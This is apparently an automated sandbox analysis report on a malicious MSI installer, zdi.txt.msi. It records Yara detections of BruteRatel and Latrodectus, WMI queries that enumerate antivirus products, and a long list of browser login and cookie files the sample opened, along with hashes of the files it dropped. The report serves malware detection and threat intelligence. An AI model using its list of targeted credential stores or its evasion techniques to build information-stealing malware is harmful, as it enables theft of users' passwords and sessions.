Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: WMIC.exe, 00000022.00000003.3205750718.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206909823.00000168E2AB4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203140018.00000168E3181000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204882904.00000168E2AB1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3205850824.0000002202B07000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206837378.00000168E2A9B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2A9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3203718696.00000168E3160000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206787476.00000168E2A8B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203737549.00000168E3161000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206703908.00000168E2A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

9_2_0B8D8848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Windows Analysis Report
zdi.txt.msi

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1566849
Product:	CloudBasic
Start time:	18:38:08
Start date:	02.12.2024
Sample:	zdi.txt.msi
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	71f04fe0afc51fee5e68e33431a7fb51
SHA1:	81952c2d3bb3558ec36900877080dbae0dc6a8bb
SHA256:	61365e29247428b26c8a6ca0d6326bbd04c2c798d7abad1660338ce3c11c68c4
Filetype:	Windows SDK Setup Transform Script (63028/2) 47.91%

Name	Type	MD5	SHA1	SHA256
C:\Config.Msi\424595.rbs	data	93D1FFA38C217A463D62EA63877CA7C9	06695B846A6A51350B61FE87C129620ACAA7935C	BF03C203088B3D5FA9829DA45AF28C9768E25FE1C5E654DA58D8A76D1EBEEC48
C:\Users\user\AppData\Local\Temp\Asxo.tmp	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\Users\user\AppData\Local\Temp\Ixav.tmp	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\Users\user\AppData\Local\Temp\Ixav.tmp-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Local\Temp\muez.tmp	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\Users\user\AppData\Local\Temp\ucsafe64.tmp	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Local\Temp\vapaef4.tmp	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\wait.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	50BD4FF60C931861E46C801A60F9E916	13B14FB516FA726CC5FA9AF17A2F93FF49449830	F2170F7DC2F97434EF4514ED4272DC8792177038A085F248BA33F9259720AFDA
C:\Windows\Installer\424593.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {ECDEC887-FE4B-4D4C-AEE0-0B38AF17C8D1}, Number of Words: 10, Subject: TimeService, Author: TimeService LLC, Name of Creating Application: TimeService, Template: ;1033, Comments: Runtime service TimeService., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200	71F04FE0AFC51FEE5E68E33431A7FB51	81952C2D3BB3558EC36900877080DBAE0DC6A8BB	61365E29247428B26C8A6CA0D6326BBD04C2C798D7ABAD1660338CE3C11C68C4
C:\Windows\Installer\MSI468D.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI46EC.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI471C.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI473C.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI4808.tmp	data	D62B38F09088D567216C13D468C527E4	8D4CA36B45D1D1A315F4ACF4221A8AC35EF2537D	A7E4784D376EF69C2F39889D10A79CB817D81A13B34C401B142BBD938164FE09
C:\Windows\Installer\MSI48D4.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	B9545ED17695A32FACE8C3408A6A3553	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
C:\Windows\Installer\SourceHash{998A301A-3216-4DC9-93E2-7045B0436D77}	Composite Document File V2 Document, Cannot read section info	2AEF57037079B519BDB463F4F20A0A54	B71DE2A22C64A816B4918043C2C01C4D2EC2C815	71B44BB7145CB56268A7A6361B7FBD6A1A18DF0BA4CB90B4A652DFDF4B3934E2
C:\Windows\Installer\inprogressinstallinfo.ipi	Composite Document File V2 Document, Cannot read section info	60CFA5C642879581FEEA5B6E4B0201E9	665E42FE194F4F46508E9596782E40E860526A22	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	6A27728FE32A1B4239330038435A13CF	CF83EC57B58301036B8AE0D5549CB3DCBA6441AB	51734DCF74FC9D851FF7A74AF841EF0DC6B1F61CF6AEE34D7D5794B8E13CDDDC
C:\Windows\Temp\~DF0606AB9D6109E824.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF49E30092373E93C5.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF581C97A89ED8416F.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF5A96D35EDE356A10.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF5E32AC49DFA98868.TMP	data	7140C98CD5829071A281A7D26D802F64	6637C21976B1F002BDCE98E8379676B81D6F90CE	B4A809EBB4F5B8CDD8474445E883B662C78EA0CB87B9CD03760891D0DF7BE26D
C:\Windows\Temp\~DF8B911CC6E45EB733.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF9F39D725BAF3F65F.TMP	Composite Document File V2 Document, Cannot read section info	D443F68E90EA7F88F23014E1169CDB48	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372
C:\Windows\Temp\~DFC86A2EECEB586208.TMP	Composite Document File V2 Document, Cannot read section info	60CFA5C642879581FEEA5B6E4B0201E9	665E42FE194F4F46508E9596782E40E860526A22	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
C:\Windows\Temp\~DFC92AA70B3A2A17E6.TMP	Composite Document File V2 Document, Cannot read section info	D443F68E90EA7F88F23014E1169CDB48	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372
C:\Windows\Temp\~DFCEF614FEBAB0279B.TMP	data	E156FC59D861D249D0F8CE0BF16CD585	5781F15958829D51FCCC798C4A4910215005D51B	AF85778E1C7915D1E46F1AD2C06B213674D8F566A3351F82C03359DE0CACCD09
C:\Windows\Temp\~DFDF5BCCD847627237.TMP	Composite Document File V2 Document, Cannot read section info	60CFA5C642879581FEEA5B6E4B0201E9	665E42FE194F4F46508E9596782E40E860526A22	EEFD6CE12F8C1CFC26D6270707E384B4E90E891DAEEE2CC9327C75B109BE8F8F
C:\Windows\Temp\~DFF12B76ECD009F834.TMP	Composite Document File V2 Document, Cannot read section info	D443F68E90EA7F88F23014E1169CDB48	293BFA801706BDB8EB75DFBEBFB4CC42D98AD1C8	77D7D88386127805C44C7B0402FB8DBD5349C97D74283FD5993D37CAB8F8E372

Windows Analysis Report zdi.txt.msi

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
zdi.txt.msi

Malware Threat Intel
Provided by